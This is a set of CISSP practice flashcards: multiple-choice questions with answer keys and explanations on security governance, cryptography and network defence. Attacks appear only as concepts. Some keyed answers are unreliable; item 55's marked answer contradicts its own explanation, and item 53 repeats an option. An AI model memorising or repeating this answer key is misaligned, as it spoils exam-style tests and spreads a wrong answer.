Harris Exam Flashcards

1
Q

Which of the following standards would be most useful to you in ensuring your information security management system follows industry best practices?

A. NIST SP 800-53

B. Six Sigma

C. ISO/IEC 27000 series

D. COSO IC

A

C. The ISO/IEC 27000 series is the only option that addresses best practices across the breadth of an ISMS. COSO IC and NIST SP 800-53 both deal with controls, which are a critical but not the only component of an ISMS.

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
2
Q

OCTAVE, NIST SP 800-30, and AS/NZS ISO 31000 are different approaches to carrying out risk management within companies and organizations. What are the differences between these methods?

A. NIST SP 800-30 and OCTAVE are corporate based, while AS/NZS is international.

B. NIST SP 800-30 is IT based, while OCTAVE and AS/NZS ISO 31000 are corporate based.

C. AS/NZS is IT based, and OCTAVE and NIST SP 800-30 are assurance based.

D. NIST SP 800-30 and AS/NZS are corporate based, while OCTAVE is international.

A

B. NIST SP 800-30, Revision 1, “Guide for Conducting Risk Assessments,” is a U.S. federal standard that is focused on IT risks. OCTAVE is a methodology to set up a risk management program within an organizational structure. AS/NZS ISO 31000 takes a much broader approach to risk management. This methodology can be used to understand a company’s financial, capital, human safety, and business decisions risks. Although it can be used to analyze security risks, it was not created specifically for this purpose.

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
3
Q

A company has an e-commerce website that carries out 60 percent of its annual revenue. Under the current circumstances, the annualized loss expectancy for a website against the threat of attack is $92,000. After implementing a new application-layer firewall, the new annualized loss expectancy would be $30,000. The firewall costs $65,000 per year to implement and maintain.

Which of the following describes the company’s approach to risk management?

A. Risk transference

B. Risk avoidance

C. Risk acceptance

D. Risk mitigation

A

D. Risk mitigation involves employing controls in an attempt to reduce either the likelihood or damage associated with an incident, or both. The four ways of dealing with risk are accept, avoid, transfer, and mitigate (reduce). A firewall is a countermeasure installed to reduce the risk of a threat.

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
4
Q

The international standards bodies ISO and IEC developed a series of standards that are used in organizations around the world to implement and maintain information security management systems. The standards were derived from the British Standard 7799, which was broken down into two main pieces. Organizations can use this series of standards as guidelines, but can also be certified against them by accredited third parties.

Which of the following are incorrect mappings pertaining to the individual standards that make up the ISO/IEC 27000 series?

i. ISO/IEC 27001 outlines ISMS implementation guidelines, and ISO/IEC 27003 outlines the ISMS program’s requirements.
ii. ISO/IEC 27005 outlines the audit and certification guidance, and ISO/IEC 27002 outlines the metrics framework.
iii. ISO/IEC 27006 outlines the program implementation guidelines, and ISO/IEC 27005 outlines risk management guidelines.
iv. ISO/IEC 27001 outlines the code of practice, and ISO/IEC 27004 outlines the implementation framework.

A. i, iii

B. i, ii

C. ii, iii, iv

D. i, ii, iii, iv

A

D. Unfortunately, you will run into questions on the CISSP exam that will be this confusing, so you need to be ready for them. The proper mapping for the ISO/IEC standards are as follows:

  • ISO/IEC 27001 ISMS requirements
  • ISO/IEC 27002 Code of practice for information security management
  • ISO/IEC 27003 Guideline for ISMS implementation
  • ISO/IEC 27004 Guideline for information security management measurement and metrics framework
  • ISO/IEC 27005 Guideline for information security risk management
  • ISO/IEC 27006 Guidance for bodies providing audit and certification of information security management systems.
How well did you know this?
1
Not at all
2
3
4
5
Perfectly
5
Q

Todd wants to be able to prevent fraud from taking place, but he knows that some people may get around the types of controls he puts into place. In those situations he wants to be able to identify when an employee is doing something suspicious.

Which of the following incorrectly describes what Todd is implementing in this scenario and what those specific controls provide?

A. Separation of duties by ensuring that a supervisor must approve the cashing of a check over $3,500. This is an administrative control that provides preventive protection for Todd’s organization.

B. Rotation of duties by ensuring that one employee only stays in one position for up to three months at a time. This is an administrative control that provides detective capabilities.

C. Security awareness training, which is a preventive administrative control that can also emphasize enforcement.

D. Dual control, which is an administrative detective control that can ensure that two employees must carry out a task simultaneously.

A

D. Dual control is an administrative preventive control. It ensures that two people must carry out a task at the same time, as in two people having separate keys when opening the vault. It is not a detective control. Notice that the question asks what Todd is not doing. Remember that on the exam you need to choose the best answer. In many situations you will not like the question or the corresponding answers on the CISSP exam, so prepare yourself. The questions can be tricky, which is one reason why the exam itself is so difficult.

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
6
Q

The term used to denote a potential cause of an unwanted incident, which may result in harm to a system or organization is

A. Vulnerability

B. Exploit

C. Threat

D. Attacker

A

C. The question provides the definition of a threat in ISO/IEC 27000. The term attacker (option D) could be used to describe a threat agent that is, in turn, a threat, but use of this term is much more restrictive. The best answer is a threat.

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
7
Q

Which of the following has an incorrect definition mapping?

i. Civil (code) law: Based on previous interpretations of laws
ii. Common law: Rule-based law, not precedent-based
iii. Customary law: Deals mainly with personal conduct and patterns of behavior
iv. Religious law: Based on religious beliefs of the region

A. i, iii

B. i, ii, iii

C. i, ii

D. iv

A

C. The following has the proper definition mappings:

i. Civil (code) law: Rule-based law, not precedent-based
ii. Common law: Based on previous interpretations of laws
iii. Customary law: Deals mainly with personal conduct and patterns of behavior
iv. Religious law: Based on religious beliefs of the region

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
8
Q

The effect of data aggregation on classification levels is best described by which of the following?

A. Data classification standards apply to all the data within an organization.

B. Aggregation is a disaster recovery technique with no effect on classification.

C. A low-classification aggregation of data can be deconstructed into higher-classification data items.

D. Items of low-classification data combine to create a higher-classification set.

A

D. Data aggregation can become a classification issue whenever someone can combine data items and end up with a higher-classification aggregate. For instance, a person’s name, address, phone number, or date of birth are normally not PII by themselves. However, when combined, they do become PII under the definition of most jurisdictions with applicable laws.

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
9
Q

The data owner is most often described by all of the following except

A. Manager in charge of a business unit

B. Ultimately responsible for the protection of the data

C. Financially liable for the loss of the data

D. Ultimately responsible for the use of the data

A

C. The data owner is the manager in charge of a specific business unit, and is ultimately responsible for the protection and use of a specific subset of information. In most situations, this person is not financially liable for the loss of his or her data.

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
10
Q

If different user groups with different security access levels need to access the same information, which of the following actions should management take?

A. Decrease the security level on the information to ensure accessibility and usability of the information.

B. Require specific written approval each time an individual needs to access the information.

C. Increase the security controls on the information.

D. Decrease the classification label on the information.

A

C. If data is going to be available to a wide range of people, more granular security should be implemented to ensure that only the necessary people access the data and that the operations they carry out are controlled. The security implemented can come in the form of authentication and authorization technologies, encryption, and specific access control mechanisms.

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
11
Q

Who is ultimately responsible for making sure data is classified and protected?

A. Data owners

B. Users

C. Administrators

D. Management

A

D. The key to this question is the use of the word “ultimately.” Though management can delegate tasks to others, it is ultimately responsible for everything that takes place within a company. Therefore, it must continually ensure that data and resources are being properly protected.

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
12
Q

Which of the following is not addressed by the data retention policy?

A. What data to keep

B. For whom data is kept

C. How long data is kept

D. Where data is kept

A

B. The data retention policy should address what data to keep, where to keep it, how to store it, and for how long to keep it. The policy is not concerned with “for whom” the data is kept.

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
13
Q

What is the final step in authorizing a system for use in an environment?

A. Certification

B. Security evaluation and rating

C. Accreditation

D. Verification

A

C. Certification is a technical review of a product, and accreditation is management’s formal approval of the findings of the certification process. This question asked you which step was the final step in authorizing a system before it is used in an environment, and that is what accreditation is all about.

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
14
Q

What feature enables code to be executed without the usual security checks?

A. Temporal isolation

B. Maintenance hook

C. Race conditions

D. Process multiplexing

A

B. Maintenance hooks get around the system’s or application’s security and access control checks by allowing whoever knows the key sequence to access the application and most likely its code. Maintenance hooks should be removed from any code before it gets into production.

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
15
Q

If a component fails, a system should be designed to do which of the following?

A. Change to a protected execution domain

B. Change to a problem state

C. Change to a more secure state

D. Release all data held in volatile memory

A

C. The state machine model dictates that a system should start up securely, carry out secure state transitions, and even fail securely. This means that if the system encounters something it deems unsafe, it should change to a more secure state for self-preservation and protection.

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
16
Q

In secure computing systems, why is there a logical form of separation used between processes?

A. Processes are contained within their own security domains so each does not make unauthorized accesses to other processes or their resources.

B. Processes are contained within their own security perimeter so they can only access protection levels above them.

C. Processes are contained within their own security perimeter so they can only access protection levels equal to them.

D. The separation is hardware and not logical in nature.

A

A. Processes are assigned their own variables, system resources, and memory segments, which make up their domain. This is done so they do not corrupt each other’s data or processing activities.

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
17
Q

Pete is a new security manager at a financial institution that develops its own internal software for specific proprietary functionality. The financial institution has several locations distributed throughout the world and has bought several individual companies over the last ten years, each with its own heterogeneous environment. Since each purchased company had its own unique environment, it has been difficult to develop and deploy internally developed software in an effective manner that meets all the necessary business unit requirements. Which of the following best describes a standard that Pete should ensure the software development team starts to implement so that various business needs can be met?

A. ISO/IEC/IEEE 42010

B. Common Criteria

C. ISO/IEC 43010

D. ISO/IEC 15408

A

A. ISO/IEC/IEEE 42010 is an international standard that outlines specifications for system architecture frameworks and architecture languages. It allows for systems to be developed in a manner that addresses all of the stakeholder’s concerns.

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
18
Q

Which of the following is an incorrect description pertaining to the common components that make up computer systems?

i. General registers are commonly used to hold temporary processing data, while special registers are used to hold process-characteristic data as in condition bits.
ii. A processor sends a memory address and a “read” request down an address bus and a memory address and a “write” request down an I/O bus.
iii. Process-to-process communication commonly takes place through memory stacks, which are made up of individually addressed buffer locations.
iv. A CPU uses a stack return pointer to keep track of the next instruction sets it needs to process.

A. i

B. i, ii

C. ii, iii

D. ii, iv

A

D. A processer sends a memory address and a “read” request down an address bus. The system reads data from that memory address and puts the requested data on the data bus. A CPU uses a program counter to keep track of the memory addresses containing the instruction sets it needs to process in sequence. A stack pointer is a component used within memory stack communication processes. An I/O bus is used by a peripheral device.

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
19
Q

Mark is a security administrator who is responsible for purchasing new computer systems for a co-location facility his company is starting up. The company has several time-sensitive applications that require extensive processing capabilities. The co-location facility is not as large as the main facility, so it can only fit a smaller number of computers, which still must carry the same processing load as the systems in the main building. Which of the following best describes the most important aspects of the products Mark needs to purchase for these purposes?

A. Systems must provide symmetric multiprocessing capabilities and virtualized environments.

B. Systems must provide asymmetric multiprocessing capabilities and virtualized environments.

C. Systems must provide multiprogramming multiprocessing capabilities and virtualized environments.

D. Systems must provide multiprogramming multiprocessing capabilities and symmetric multiprocessing environments.

A

B. When systems provide asymmetric multiprocessing, this means multiple CPUs can be used for processing. Asymmetric indicates the capability of assigning specific applications to one CPU so that they do not have to share computing capabilities with other competing processes, which increases performance. Since a smaller number of computers can fit in the new location, virtualization should be deployed to allow for several different systems to share the same physical computer platforms.

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
20
Q

Which of the following best describes an item the software development team needs to address to ensure that drivers cannot be loaded in an unauthorized manner?

A. Improved security kernel processes

B. Improved security perimeter processes

C. Improved application programming interface processes

D. Improved garbage collection processes

A

A. If device drivers can be loaded improperly, then either the access control rules outlined within the reference monitor need to be improved upon or the current rules need to be better enforced through the security kernel processes. Only authorized subjects should be able to install sensitive software components that run within ring 0 of a system.

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
21
Q

John has been told that one of the applications installed on a web server within the DMZ accepts any length of information that a customer using a web browser inputs into the form the web server provides to collect new customer data. Which of the following describes an issue that John should be aware of pertaining to this type of vulnerability?

A. Application is written in the C programming language.

B. Application is not carrying out enforcement of the trusted computing base.

C. Application is running in ring 3 of a ring-based architecture.

D. Application is not interacting with the memory manager properly.

A

A. The C language is susceptible to buffer overflow attacks because it allows for direct pointer manipulations to take place. Specific commands can provide access to low-level memory addresses without carrying out bounds checking.

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
22
Q

Which option best describes the difference between HMAC and CBC-MAC?

A. HMAC creates a message digest and is used for integrity; CBC-MAC is used to encrypt blocks of data for confidentiality.

B. HMAC uses a symmetric key and a hashing algorithm; CBC-MAC uses the first block for the checksum.

C. HMAC provides integrity and data origin authentication; CBC-MAC uses a block cipher for the process of creating a MAC.

D. HMAC encrypts a message with a symmetric key and then puts the result through a hashing algorithm; CBC-MAC encrypts the whole message.

A

C. In an HMAC operation, a message is concatenated with a symmetric key and the result is put through a hashing algorithm. This provides integrity and system or data authentication. CBC-MAC uses a block cipher to create a MAC, which is the last block of ciphertext.

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
23
Q

What is an advantage of RSA over DSA?

A. It can provide digital signature and encryption functionality.

B. It uses fewer resources and encrypts faster because it uses symmetric keys.

C. It is a block cipher rather than a stream cipher.

D. It employs a one-time encryption pad.

A

A. RSA can be used for data encryption, key exchange, and digital signatures. DSA can be used only for digital signatures.

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
24
Q

What is used to create a digital signature?

A. The receiver’s private key

B. The sender’s public key

C. The sender’s private key

D. The receiver’s public key

A

C. A digital signature is a message digest that has been encrypted with the sender’s private key. A sender, or anyone else, should never have access to the receiver’s private key.

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
25
Q

Why would a certificate authority revoke a certificate?

A. If the user’s public key has become compromised

B. If the user changed over to using the PEM model that uses a web of trust

C. If the user’s private key has become compromised

D. If the user moved to a new location

A

C. The reason a certificate is revoked is to warn others who use that person’s public key that they should no longer trust the public key because, for some reason, that public key is no longer bound to that particular individual’s identity. This could be because an employee left the company or changed his name and needed a new certificate, but most likely it is because the person’s private key was compromised.

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
26
Q

What does DEA stand for?

A. Data Encoding Algorithm

B. Data Encoding Application

C. Data Encryption Algorithm

D. Digital Encryption Algorithm

A

C. DEA is the algorithm that fulfilled the DES standard. So DEA has all of the attributes of DES: a symmetric block cipher that uses 64-bit blocks, 16 rounds, and a 56-bit key.

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
27
Q

Who was involved in developing the first public key algorithm?

A. Adi Shamir

B. Ross Anderson

C. Bruce Schneier

D. Martin Hellman

A

D. The first released public key cryptography algorithm was developed by Whitfield Diffie and Martin Hellman.

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
28
Q

DES performs how many rounds of transposition/permutation and substitution?

A. 16

B. 32

C. 64

D. 56

A

A. DES carries out 16 rounds of mathematical computation on each 64-bit block of data it is responsible for encrypting. A round is a set of mathematical formulas used for encryption and decryption processes.

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
29
Q

If different keys generate the same ciphertext for the same message, what is this called?

A. Collision

B. Secure hashing

C. MAC

D. Key clustering

A

D. Message A was encrypted with key A and the result is ciphertext Y. If that same message A were encrypted with key B, the result should not be ciphertext Y. The ciphertext should be different because a different key was used. But if the ciphertext is the same, this occurrence is referred to as key clustering.

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
30
Q

What is the definition of an algorithm’s work factor?

A. The time it takes to encrypt and decrypt the same plaintext

B. The time it takes to break the encryption

C. The time it takes to implement 16 rounds of computation

D. The time it takes to apply substitution functions

A

B. The work factor of a cryptosystem is the amount of time and resources necessary to break the cryptosystem or its encryption process. The goal is to make the work factor so high that an attacker could not be successful in breaking the algorithm or cryptosystem.

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
31
Q

Which of the following is based on the fact that it is hard to factor large numbers into two original prime numbers?

A. ECC

B. RSA

C. DES

D. Diffie-Hellman

A

B. The RSA algorithm’s security is based on the difficulty of factoring large numbers into their original prime numbers. This is a one-way function. It is easier to calculate the product than it is to identify the prime numbers used to generate that product.

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
32
Q

Which of the following describes the difference between the Data Encryption Standard and the Rivest-Shamir-Adleman algorithm?

A. DES is symmetric, while RSA is asymmetric.

B. DES is asymmetric, while RSA is symmetric.

C. They are hashing algorithms, but RSA produces a 160-bit hashing value.

D. DES creates public and private keys, while RSA encrypts messages.

A

A. DES is a symmetric algorithm. RSA is an asymmetric algorithm. DES is used to encrypt data, and RSA is used to create public/private key pairs.

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
33
Q

Which of the following uses a symmetric key and a hashing algorithm?

A. HMAC

B. Triple-DES

C. ISAKMP-OAKLEY

D. RSA

A

A. When an HMAC function is used, a symmetric key is combined with the message, and then that result is put though a hashing algorithm. The result is an HMAC value. HMAC provides data origin authentication and data integrity.

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
34
Q

The generation of keys that are made up of random values is referred to as Key Derivation Functions (KDFs). What values are not commonly used in this key generation process?

A. Hashing values

B. Asymmetric values

C. Salts

D. Passwords

A

B. Different values can be used independently or together to play the role of random key material. The algorithm is created to use specific hash, password, and\or salt value, which will go through a certain number of rounds of mathematical functions dictated by the algorithm.

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
35
Q

When should a Class C fire extinguisher be used instead of a Class A fire extinguisher?

A. When electrical equipment is on fire

B. When wood and paper are on fire

C. When a combustible liquid is on fire

D. When the fire is in an open area

A

A. A Class C fire is an electrical fire. Thus, an extinguisher with the proper suppression agent should be used. The following table shows the fire types, their attributes, and suppression methods:

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
36
Q

Which of the following answers contains a category of controls that does not belong in a physical security program?

A. Deterrence and delaying

B. Response and detection

C. Assessment and detection

D. Delaying and lighting

A

D. The categories of controls that should make up any physical security program are deterrence, delaying, detection, assessment, and response. Lighting is a control itself, not a category of controls.

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
37
Q

How does TKIP provide more protection for WLAN environments?

A. It uses the AES algorithm.

B. It decreases the IV size and uses the AES algorithm.

C. It adds more keying material.

D. It uses MAC and IP filtering.

A

C. The TKIP protocol actually works with WEP by feeding it keying material, which is data to be used for generating random keystreams. TKIP increases the IV size, ensures it is random for each packet, and adds the sender’s MAC address to the keying material.

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
38
Q

Which of the following is not a characteristic of the IEEE 802.11a standard?

A. It works in the 5-GHz range.

B. It uses the OFDM spread spectrum technology.

C. It provides 52 Mbps in bandwidth.

D. It covers a smaller distance than 802.11b.

A

C. The IEEE standard 802.11a uses the OFDM spread spectrum technology, works in the 5-GHz frequency band, and provides bandwidth of up to 54 Mbps. The operating range is smaller because it works at a higher frequency.

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
39
Q

Which of the following can take place if an attacker can insert tagging values into network- and switch-based protocols with the goal of manipulating traffic at the data link layer?

A. Open relay manipulation

B. VLAN hopping attack

C. Hypervisor denial-of-service attack

D. Smurf attack

A

B. VLAN hopping attacks allow attackers to gain access to traffic in various VLAN segments. An attacker can have a system act as though it is a switch. The system understands the tagging values being used in the network and the trunking protocols, and can insert itself between other VLAN devices and gain access to the traffic going back and forth. Attackers can also insert tagging values to manipulate the control of traffic at this data link layer.

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
40
Q

Which of the following proxies cannot make access decisions based upon protocol commands?

A. Application

B. Packet filtering

C. Circuit

D. Stateful

A

C. Application and circuit are the only types of proxy-based firewall solutions listed here. The others do not use proxies. Circuit-based proxy firewalls make decisions based on header information, not the protocol’s command structure. Application-based proxies are the only ones that understand this level of granularity about the individual protocols.

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
41
Q

Which of the following is a bridge-mode technology that can monitor individual traffic links between virtual machines or can be integrated within a hypervisor component?

A. Orthogonal frequency division

B. Unified threat management modem

C. Virtual firewall

D. Internet Security Association and Key Management Protocol

A

C. Virtual firewalls can be bridge-mode products, which monitor individual traffic links between virtual machines, or they can be integrated within the hypervisor. The hypervisor is the software component that carries out virtual machine management and oversees guest system software execution. If the firewall is embedded within the hypervisor, then it can “see” and monitor all the activities taking place within the one system.

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
42
Q

Metro Ethernet is a MAN protocol that can work in network infrastructures made up of access, aggregation, metro, and core layers. Which of the following best describes these network infrastructure layers?

A. The access layer connects the customer’s equipment to a service provider’s aggregation network. Aggregation occurs on a core network. The metro layer is the metropolitan area network. The core connects different metro networks.

B. The access layer connects the customer’s equipment to a service provider’s core network. Aggregation occurs on a distribution network at the core. The metro layer is the metropolitan area network.

C. The access layer connects the customer’s equipment to a service provider’s aggregation network. Aggregation occurs on a distribution network. The metro layer is the metropolitan area network. The core connects different access layers.

D. The access layer connects the customer’s equipment to a service provider’s aggregation network. Aggregation occurs on a distribution network. The metro layer is the metropolitan area network. The core connects different metro networks.

A

D. The access layer connects the customer’s equipment to a service provider’s aggregation network. Aggregation occurs on a distribution network. The metro layer is the metropolitan area network. The core connects different metro networks.

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
43
Q

Which of the following provides an incorrect definition of the specific component or protocol that makes up IPSec?

A. Authentication Header protocol provides data integrity, data origin authentication, and protection from replay attacks.

B. Encapsulating Security Payload protocol provides confidentiality, data origin authentication, and data integrity.

C. Internet Security Association and Key Management Protocol provides a framework for security association creation and key exchange.

D. Internet Key Exchange provides authenticated keying material for use with encryption algorithms.

A

D. Authentication Header protocol provides data integrity, data origin authentication, and protection from replay attacks. Encapsulating Security Payload protocol provides confidentiality, data origin authentication, and data integrity. Internet Security Association and Key Management Protocol provides a framework for security association creation and key exchange. Internet Key Exchange provides authenticated keying material for use with ISAKMP.

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
44
Q

Which of the following is not a characteristic of the Protected Extensible Authentication Protocol?

A. Authentication protocol used in wireless networks and point-to-point connections

B. Designed to provide authentication for 802.11 WLANs

C. Designed to support 802.1X port access control and Transport Layer Security

D. Designed to support password-protected connections

A

D. PEAP is a version of EAP and is an authentication protocol used in wireless networks and point-to-point connections. PEAP is designed to provide authentication for 802.11 WLANs, which support 802.1X port access control and TLS. It is a protocol that encapsulates EAP within a potentially encrypted and authenticated TLS tunnel.

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
45
Q

An effective method to shield networks from unauthenticated DHCP clients is through the use of _______________ on network switches.

A. DHCP snooping

B. DHCP protection

C. DHCP shielding

D. DHCP caching

A

A. DHCP snooping ensures that DHCP servers can assign IP addresses to only selected systems, identified by their MAC addresses. Also, advance network switches now have the capability to direct clients toward legitimate DHCP servers to get IP addresses and to restrict rogue systems from becoming DHCP servers on the network.

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
46
Q

Don is a security manager of a large medical institution. One of his groups develops proprietary software that provides distributed computing through a client/server model. He has found out that some of the systems that maintain the proprietary software have been experiencing half-open denial-of-service attacks. Some of the software is antiquated and still uses basic remote procedure calls, which has allowed for masquerading attacks to take place.

What type of client ports should Don make sure the institution’s software is using when client-to-server communication needs to take place?

A. Well known

B. Registered

C. Dynamic

D. Free

A

C. Well-known ports are mapped to commonly used services (HTTP, FTP, etc.). Registered ports are 1,024 to 49,151, and vendors register specific ports to map to their proprietary software. Dynamic ports (private ports) are available for use by any application.

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
47
Q

Don is a security manager of a large medical institution. One of his groups develops proprietary software that provides distributed computing through a client/server model. He has found out that some of the systems that maintain the proprietary software have been experiencing half-open denial-of-service attacks. Some of the software is antiquated and still uses basic remote procedure calls, which has allowed for masquerading attacks to take place.

Which of the following is a cost-effective countermeasure that Don’s team should implement?

A. Stateful firewall

B. Network address translation

C. SYN proxy

D. IPv6

A

C. A half-open attack is a type of DoS that is also referred to as a SYN flood. To thwart this type of attack, Don’s team can use SYN proxies, which limit the number of open and abandoned network connections. The SYN proxy is a piece of software that resides between the sender and receiver, and only sends TCP traffic to the receiving system if the TCP handshake process completes successfully.

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
48
Q

Don is a security manager of a large medical institution. One of his groups develops proprietary software that provides distributed computing through a client/server model. He has found out that some of the systems that maintain the proprietary software have been experiencing half-open denial-of-service attacks. Some of the software is antiquated and still uses basic remote procedure calls, which has allowed for masquerading attacks to take place.

What should Don’s team put into place to stop the masquerading attacks that have been taking place?

A. Dynamic packet-filtering firewall

B. ARP spoofing protection

C. Disable unnecessary ICMP traffic at edge routers

D. SRPC

A

D. Basic RPC does not have authentication capabilities, which allows for masquerading attacks to take place. Secure RPC (SRPC) can be implemented, which requires authentication to take place before remote systems can communicate with each other. Authentication can take place using shared secrets, public keys, or Kerberos tickets.

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
49
Q

John is the manager of the security team within his company. He has learned that attackers have installed sniffers throughout the network without the company’s knowledge. Along with this issue his team has also found out that two DNS servers had no record replication restrictions put into place and the servers have been caching suspicious name resolution data.

Which of the following is the best countermeasure to put into place to help reduce the threat of network sniffers viewing network management traffic?

A. SNMP v3

B. L2TP

C. CHAP

D. Dynamic packet-filtering firewall

A

A. SNMP versions 1 and 2 send their community string values in cleartext, but with version 3, cryptographic functionality has been added, which provides encryption, message integrity, and authentication security. So the sniffers that are installed on the network cannot sniff SNMP traffic.

50
Q

John is the manager of the security team within his company. He has learned that attackers have installed sniffers throughout the network without the company’s knowledge. Along with this issue his team has also found out that two DNS servers had no record replication restrictions put into place and the servers have been caching suspicious name resolution data.

Which of the following unauthorized activities have most likely been taking place in this situation?

A. DNS querying

B. Phishing

C. Forwarding

D. Zone transfer

A

D. The primary and secondary DNS servers synchronize their information through a zone transfer. After changes take place to the primary DNS server, those changes must be replicated to the secondary DNS server. It is important to configure the DNS server to allow zone transfers to take place only between the specific servers. Attackers can carry out zone transfers to gather very useful network information from victims’ DNS servers. Unauthorized zone transfers can take place if the DNS servers are not properly configured to restrict this type of activity.

51
Q

John is the manager of the security team within his company. He has learned that attackers have installed sniffers throughout the network without the company’s knowledge. Along with this issue his team has also found out that two DNS servers had no record replication restrictions put into place and the servers have been caching suspicious name resolution data.

Which of the following is the best countermeasure that John’s team should implement to protect from improper caching issues?

A. PKI

B. DHCP snooping

C. ARP protection

D. DNSSEC

A

D. When a DNS server receives an improper (potentially malicious) name resolution response, it will cache it and provide it to all the hosts it serves unless DNSSEC is implemented. If DNSSEC were enabled on a DNS server, then the server would, upon receiving a response, validate the digital signature on the message before accepting the information to make sure that the response is from an authorized DNS server.

52
Q

Sean is the new security administrator for a large financial institution. There are several issues that Sean is made aware of the first week he is in his new position. First, spurious packets seem to arrive at critical servers even though each network has tightly configured firewalls at each gateway position to control traffic to and from these servers. One of Sean’s team members complains that the current firewall logs are excessively large and full of useless data. He also tells Sean that the team needs to be using fewer permissive rules instead of the current “any-any” rule type in place. Sean has also found out that some team members want to implement tarpits on some of the most commonly attacked systems.

Which of the following is most likely taking place to allow spurious packets to gain unauthorized access to critical servers?

A. TCP sequence hijacking is taking place.

B. Source routing is not restricted.

C. Fragment attacks are underway.

D. Attacker is tunneling communication through PPP.

A

B. Source routing means the packet decides how to get to its destination, not the routers in between the source and destination computer. Source routing moves a packet throughout a network on a predetermined path. To make sure none of this misrouting happens, many firewalls are configured to check for source routing information within the packet and deny it if it is present.

53
Q

Sean is the new security administrator for a large financial institution. There are several issues that Sean is made aware of the first week he is in his new position. First, spurious packets seem to arrive at critical servers even though each network has tightly configured firewalls at each gateway position to control traffic to and from these servers. One of Sean’s team members complains that the current firewall logs are excessively large and full of useless data. He also tells Sean that the team needs to be using fewer permissive rules instead of the current “any-any” rule type in place. Sean has also found out that some team members want to implement tarpits on some of the most commonly attacked systems.

Which of the following best describes the firewall configuration issues Sean’s team member is describing?

A. Clean-up rule, stealth rule

B. Stealth rule, silent rule

C. Silent rule, negate rule

D. Stealth rule, silent rule

A

C. The following describes the different firewall rule types:

  • Silent rule Drops “noisy” traffic without logging it. This reduces log sizes by not responding to packets that are deemed unimportant.
  • Stealth rule Disallows access to firewall software from unauthorized systems.
  • Cleanup rule The last rule in the rule base, which drops and logs any traffic that does not meet the preceding rules.
  • Negate rule Used instead of the broad and permissive “any rules.” Negate rules provide tighter permission rights by specifying what system can be accessed and how.
54
Q

Sean is the new security administrator for a large financial institution. There are several issues that Sean is made aware of the first week he is in his new position. First, spurious packets seem to arrive at critical servers even though each network has tightly configured firewalls at each gateway position to control traffic to and from these servers. One of Sean’s team members complains that the current firewall logs are excessively large and full of useless data. He also tells Sean that the team needs to be using fewer permissive rules instead of the current “any-any” rule type in place. Sean has also found out that some team members want to implement tarpits on some of the most commonly attacked systems.

Which of the following best describes why Sean’s team wants to put in the mentioned countermeasure for the most commonly attacked systems?

A. Prevent production system hijacking

B. Reduce DoS attack effects

C. Gather statistics during the process of an attack

D. Increase forensic capabilities

A

B. A tarpit is commonly a piece of software configured to emulate a vulnerable, running service. Once the attackers start to send packets to this “service,” the connection to the victim system seems to be live and ongoing, but the response from the victim system is slow and the connection may time out. Most attacks and scanning activities take place through automated tools that require quick responses from their victim systems. If the victim systems do not reply or are very slow to reply, the automated tools may not be successful because the protocol connection times out. This can reduce the effects of a DoS attack.

55
Q

Tom’s company has been experiencing many issues with unauthorized sniffers being installed on the network. One reason is because employees can plug their laptops, smartphones, and other mobile devices into the network, any of which may be infected and have a running sniffer that the owner is not aware of. Implementing VPNs will not work because all of the network devices would need to be configured for specific VPNs, and some devices, as in their switches, do not have this type of functionality available. Another issue Tom’s team is dealing with is how to secure internal wireless traffic. While the wireless access points can be configured with digital certificates for authentication, pushing out and maintaining certificates on each wireless user device is cost prohibitive and will place too much of a burden on the network team. Tom’s boss has also told him that the company needs to move from a landline metropolitan area network solution to a wireless solution.

What should Tom’s team implement to provide source authentication and data encryption at the data link level?

A. IEEE 802.1AR

B. IEEE 802.1AE

C. IEEE 802.1AF

D. IEEE 802.1X

A

D. IEEE 802.1AR provides a unique ID for a device. IEEE 802.1AE provides data encryption, integrity, and origin authentication functionality. IEEE 802.1AF carries out key agreement functions for the session keys used for data encryption. Each of these standards provides specific parameters to work within an IEEE 802.1X EAP-TLS framework. A recent version (802.1X-2010) has integrated IEEE 802.1AE and IEEE 802.1AR to support service identification and optional point-to-point encryption.

56
Q

